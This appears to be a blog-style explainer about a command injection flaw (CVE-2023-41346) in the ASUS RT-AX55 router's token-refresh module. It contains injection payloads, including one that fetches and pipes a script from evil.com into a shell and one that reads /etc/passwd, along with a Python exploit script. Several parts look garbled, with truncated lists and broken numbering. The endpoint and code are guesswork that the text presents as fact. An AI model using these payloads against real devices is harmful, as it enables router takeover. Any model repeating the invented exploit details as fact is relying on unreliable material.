CVE-2023-41346 - Command Injection Flaw in ASUS RT-AX55 Token-Refresh Module

If you use the ASUS RT-AX55 router, you should know about a dangerous vulnerability: CVE-2023-41346. This weakness lies in the router's token-refresh module, and it lets hackers run any command they want—*if* they already have the right login. Let’s break down what happened, how it works, and what you should do.

What Is CVE-2023-41346?

CVE-2023-41346 is a *command injection vulnerability* in the ASUS RT-AX55 router's authentication process, specifically within its token-refresh system. This system is supposed to renew your login token so your session stays active. But, because the code doesn't clean up (sanitize) special characters properly, a logged-in attacker can sneak in extra commands. As a result, they can force the router to:

Crash the system

In short: a hacker who is already logged in can take full control!

Technical Details

The issue is in the way the router’s firmware handles user input for the token refresh process. The code does not properly filter or "escape" special characters.

Suppose the router expects a token value like this

{
  "token": "abcdef123456"
}

But what if someone submits

{
  "token": "abcdef123456;reboot"
}

Because the software doesn’t filter the ;reboot part, it gets passed onto the system’s shell. The shell treats ; as "run the next command," so instead of just handling the token, the router runs reboot—or any other command the attacker includes.

While ASUS hasn't released the actual vulnerable code, it typically looks something like

// Pseudocode for token-refresh handling
void refresh_token(char *token) {
    char cmd[200];
    snprintf(cmd, sizeof(cmd), "refresh_token.sh %s", token);
    system(cmd);  // Vulnerable: passes unchecked input to shell
}

If token contains special shell characters like ;, an attacker can run extra commands.

How to Exploit CVE-2023-41346

Requirement: The attacker needs a valid login session on the router.

Intercept or craft a token refresh request (usually via the web interface or API).

3. Insert a malicious command in the token field, like abcdef;cat /etc/passwd.
4. Submit the request. The router will execute cat /etc/passwd (or any other command).

Example payload

POST /token-refresh
Content-Type: application/json

{
  "token": "abcdef;wget http://evil.com/x.sh -O- | sh"
}

This causes the router to download and run a script from a malicious server.

Here is an example exploit using Python and the router's API

import requests

url = "http://<router-ip>/token-refresh";
headers = {'Content-Type': 'application/json'}
payload = {'token': 'abcdef;reboot'}

session = requests.Session()
session.cookies.set('asus_session', '<valid-session-cookie>')  # Replace with your session cookie

response = session.post(url, json=payload, headers=headers)
print(response.status_code, response.text)

*Replace <router-ip> and <valid-session-cookie> with your router's details.*

Upgrade Firmware:

ASUS has released fixed firmware for this flaw. Go to the ASUS Download Center and install the latest update for your RT-AX55.

References

- ASUS Official Security Advisory - CVE-2023-41346
- NVD - National Vulnerability Database for CVE-2023-41346
- TheHackerNews Coverage

Conclusion

CVE-2023-41346 proves that small mistakes in filtering user input can open the door to serious attacks—even on devices you trust at home. If you have an ASUS RT-AX55, update now and double check your permissions. Command injection bugs are serious, but with quick patching and good router hygiene, you’ll be much safer!


*Stay safe out there, and keep your devices up-to-date!*

Timeline

Published on: 11/03/2023 05:15:29 UTC
Last modified on: 11/13/2023 16:59:38 UTC